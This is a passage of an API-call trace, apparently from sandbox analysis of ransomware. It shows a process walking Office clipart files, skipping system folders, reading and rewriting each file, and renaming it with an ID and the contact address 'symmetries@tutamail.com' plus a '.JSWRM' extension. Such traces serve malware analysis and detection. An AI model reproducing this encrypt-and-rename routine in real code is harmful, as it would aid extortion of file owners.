lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9261f7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe9261f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe9261f7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3094, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152608.WMF", cAlternateFileName="")) returned 1 [0084.169] lstrcmpiW (lpString1="J0152608.WMF", lpString2=".") returned 1 [0084.169] lstrcmpiW (lpString1="J0152608.WMF", lpString2="..") returned 1 [0084.169] lstrcmpiW (lpString1="J0152608.WMF", lpString2="...") returned 1 [0084.169] lstrcmpiW (lpString1="J0152608.WMF", lpString2="windows") returned -1 [0084.169] lstrcmpiW (lpString1="J0152608.WMF", lpString2="recovery") returned -1 [0084.169] lstrcmpiW (lpString1="J0152608.WMF", lpString2="perflogs") returned -1 [0084.169] lstrcmpiW (lpString1="J0152608.WMF", lpString2="documents and settings") returned 1 [0084.169] lstrcmpiW (lpString1="J0152608.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.169] lstrcmpiW (lpString1="J0152608.WMF", lpString2="system volume information") returned -1 [0084.169] lstrcmpiW (lpString1="J0152608.WMF", lpString2="msocache") returned -1 [0084.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0084.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152608.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152608.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152608.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0084.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0084.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152608.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152608.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152608.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0084.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0084.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0084.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0084.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152608.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.169] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12436) returned 1 [0084.169] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3090) returned 0x24d210 [0084.170] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3090, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3090, lpOverlapped=0x0) returned 1 [0084.209] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.209] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3090, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3090, lpOverlapped=0x0) returned 1 [0084.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0084.209] CloseHandle (hObject=0x314) returned 1 [0084.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0084.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0084.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0084.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0084.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0084.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0084.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0084.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0084.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0084.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0084.210] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152608.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152608.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152608.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0084.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0084.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0084.211] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8fff80, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe8fff80, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe9261f7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1748, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152610.WMF", cAlternateFileName="")) returned 1 [0084.211] lstrcmpiW (lpString1="J0152610.WMF", lpString2=".") returned 1 [0084.211] lstrcmpiW (lpString1="J0152610.WMF", lpString2="..") returned 1 [0084.211] lstrcmpiW (lpString1="J0152610.WMF", lpString2="...") returned 1 [0084.211] lstrcmpiW (lpString1="J0152610.WMF", lpString2="windows") returned -1 [0084.211] lstrcmpiW (lpString1="J0152610.WMF", lpString2="recovery") returned -1 [0084.211] lstrcmpiW (lpString1="J0152610.WMF", lpString2="perflogs") returned -1 [0084.211] lstrcmpiW (lpString1="J0152610.WMF", lpString2="documents and settings") returned 1 [0084.211] lstrcmpiW (lpString1="J0152610.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.211] lstrcmpiW (lpString1="J0152610.WMF", lpString2="system volume information") returned -1 [0084.211] lstrcmpiW (lpString1="J0152610.WMF", lpString2="msocache") returned -1 [0084.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0084.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152610.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152610.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152610.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0084.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0084.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152610.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152610.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152610.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0084.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0084.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0084.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0084.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152610.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.212] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5960) returned 1 [0084.212] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1740) returned 0x205850 [0084.213] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1740, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1740, lpOverlapped=0x0) returned 1 [0084.238] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.238] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1740, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1740, lpOverlapped=0x0) returned 1 [0084.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0084.238] CloseHandle (hObject=0x314) returned 1 [0084.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0084.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0084.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0084.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0084.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0084.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0084.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0084.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0084.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0084.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0084.239] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152610.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152610.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152610.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0084.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0084.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0084.240] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe88d87c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe88d87c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe8b3ab6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2584, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152622.WMF", cAlternateFileName="")) returned 1 [0084.240] lstrcmpiW (lpString1="J0152622.WMF", lpString2=".") returned 1 [0084.240] lstrcmpiW (lpString1="J0152622.WMF", lpString2="..") returned 1 [0084.240] lstrcmpiW (lpString1="J0152622.WMF", lpString2="...") returned 1 [0084.240] lstrcmpiW (lpString1="J0152622.WMF", lpString2="windows") returned -1 [0084.240] lstrcmpiW (lpString1="J0152622.WMF", lpString2="recovery") returned -1 [0084.240] lstrcmpiW (lpString1="J0152622.WMF", lpString2="perflogs") returned -1 [0084.240] lstrcmpiW (lpString1="J0152622.WMF", lpString2="documents and settings") returned 1 [0084.240] lstrcmpiW (lpString1="J0152622.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.240] lstrcmpiW (lpString1="J0152622.WMF", lpString2="system volume information") returned -1 [0084.240] lstrcmpiW (lpString1="J0152622.WMF", lpString2="msocache") returned -1 [0084.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0084.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152622.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152622.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152622.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.240] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0084.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0084.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152622.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.240] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152622.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152622.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0084.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0084.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0084.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.241] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0084.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152622.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.243] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9604) returned 1 [0084.243] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2580) returned 0x24d210 [0084.243] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2580, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2580, lpOverlapped=0x0) returned 1 [0084.245] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.245] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2580, lpOverlapped=0x0) returned 1 [0084.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0084.245] CloseHandle (hObject=0x314) returned 1 [0084.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0084.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0084.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0084.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0084.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0084.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0084.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0084.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0084.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0084.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0084.245] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152622.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152622.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152622.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0084.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0084.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0084.246] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8fff80, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe8fff80, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe9261f7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6688, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152626.WMF", cAlternateFileName="")) returned 1 [0084.246] lstrcmpiW (lpString1="J0152626.WMF", lpString2=".") returned 1 [0084.246] lstrcmpiW (lpString1="J0152626.WMF", lpString2="..") returned 1 [0084.246] lstrcmpiW (lpString1="J0152626.WMF", lpString2="...") returned 1 [0084.246] lstrcmpiW (lpString1="J0152626.WMF", lpString2="windows") returned -1 [0084.246] lstrcmpiW (lpString1="J0152626.WMF", lpString2="recovery") returned -1 [0084.246] lstrcmpiW (lpString1="J0152626.WMF", lpString2="perflogs") returned -1 [0084.246] lstrcmpiW (lpString1="J0152626.WMF", lpString2="documents and settings") returned 1 [0084.246] lstrcmpiW (lpString1="J0152626.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.246] lstrcmpiW (lpString1="J0152626.WMF", lpString2="system volume information") returned -1 [0084.246] lstrcmpiW (lpString1="J0152626.WMF", lpString2="msocache") returned -1 [0084.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0084.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152626.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152626.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152626.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0084.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0084.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152626.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, 